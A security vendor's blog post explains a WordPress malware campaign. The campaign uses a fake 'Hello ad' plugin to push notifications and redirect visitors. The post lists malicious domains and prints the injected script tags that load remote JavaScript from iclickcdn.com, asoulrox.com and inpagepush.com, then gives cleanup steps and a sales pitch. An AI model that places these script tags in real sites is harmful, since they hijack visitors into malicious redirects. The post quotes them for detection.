How to Fix Push Notification Malware in a WordPress Website?

Updated on

Fixing push notification malware in wordpress

Push Notification WordPress Malware

A team of security researchers tracked malicious domains for push notification malware in WordPress. This campaign was combined with the ongoing redirection to unknown URLs in WordPress sites.

A few domains where the redirection is happening include

inpagepush[.]com, 

asoulrox[.]com and iclickcdn[.]com,

 justcannabis[.]online, 

0.realhelpcompany[.]ga, 

fast.helpmart[.]ga/m[.]js?w=085, etc.

Hackers have gone one step ahead this time to make this hacking campaign more sophisticated by installing a legitimate-looking ‘Hello ad’ plugin to infected WordPress websites. 

More on it below.

Related Guide – Step By Step WordPress Malware Removal Guide

Symptoms of the Push Notifications Malware – WordPress

Vulgar Push Notifications: Visitors are being shown malicious/vulgar push notifications to the user of the affected website:

Website Redirection: Website redirection to malicious pages by clicking links on pages within your WordPress.

A few URLs where your website might be redirecting to include inpagepush[.]com, asoulrox[.]com, and iclickcdn[.]com.

Unknown Plugins Found: In some cases, our WP security team identified a new malicious plugin that is added to WordPress by the name of ‘Hello ad’.

Device-Specific/Mobile Only Virus: We noticed that this malware hides very well. It will not always send push notifications or redirect users. The behavior is device-specific.

 Sometimes the malware shows push notifications only on mobile devices and sometimes it only redirects new users, it does not target users who have already opened the website earlier.

push notification hello ad plugin redirecting malware

Curious Case of Malicious Hello Ad Plugin

If you’re seeing the “Hello Ad” plugin on websites, beware! This plugin is actually a malicious piece of code that can redirect your website visitors to hacker-controlled websites. 

This legitimate-looking plugin adds the following malicious Javascript code to the page source:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>

<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>

<script type="text/javascript" src="https//www.*****.com//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>

wp-content-uploadsThe code added by this plugin plays an important role in redirection. However, we have seen hackers evolve and obscure this with each new campaign.

The Hello Ad plugin is designed to look like a legitimate plugin, but it actually contains malicious Javascript code that can redirect users to dangerous websites. We urge you to exercise caution and avoid this plugin if you see it on any websites you visit.

Related Guide – WordPress Malware Removal Checklist 2022

Consequences of Push Notification & Redirection Malware on WordPress

This type of attack leads to the following situations:

  • Loss of reputation of your brand.
  • Big loss for web traffic since they are redirected.
  • Reduced sales and business.
  • Legal problems when sending (even if unintentionally) users to illegal web pages.

If you do see that a site has been hacked, you’ll want to get it back! Worry not and read – WordPress Website Hacking & Prevention 2022 Guide


Related Posts


How to fix the Push Notifications, Hello Ad & Redirection Hack Campaign

Check hacker’s favorite places: Hackers have a few obvious places where they insert the virus/malicious code. When starting to fix your WordPress, it’s best you start with these. The following files should be looked at first:

  • index.php
  • wp-content/themes/{themeName}/functions.php
  • wp-config.php
  • Core theme files
  • .htaccess

Find and remove the hello ad plugin: If you find this “legitimate” plugin that you think your developer or you may have installed in the past, please uninstall it, as it can damage your site.

Removing the Redirect: We recently noticed that many WordPress websites are redirected to malicious but legitimate websites.. Taking care of malicious redirection hacks requires looking into the database tables, core theme files, and sometimes your server’s configuration files too. Look for scripts/resources loaded from unknown URLs.

Since removing redirection malware is not an easy task, we have created a detailed step-by-step guide to fix redirection malware hack in wordpress. Although hackers are evolving and updating their methods to avoid being on the radar of security companies, the underlying principle is the same.

Let’s START WITH A MALWARE SCAN NOW

We also have a compiled list of top wordpress security scanners here.

Hackers are finding new ways to exploit security vulnerabilities in wordpress unknown to the world and combining various exploits to hack a wordpress website

While removing hacking is one part, what is even more important is to make sure you never get hacked and prevent your WordPress from redirection hack- WP Hacked Help has the most competent team to clean up and fix this hack in the future. 

Did you know

Are you next?

Scan your website with the WP Hacked Help security scanner and contact our team of security experts to fix your hacked wordpress site before it’s too late.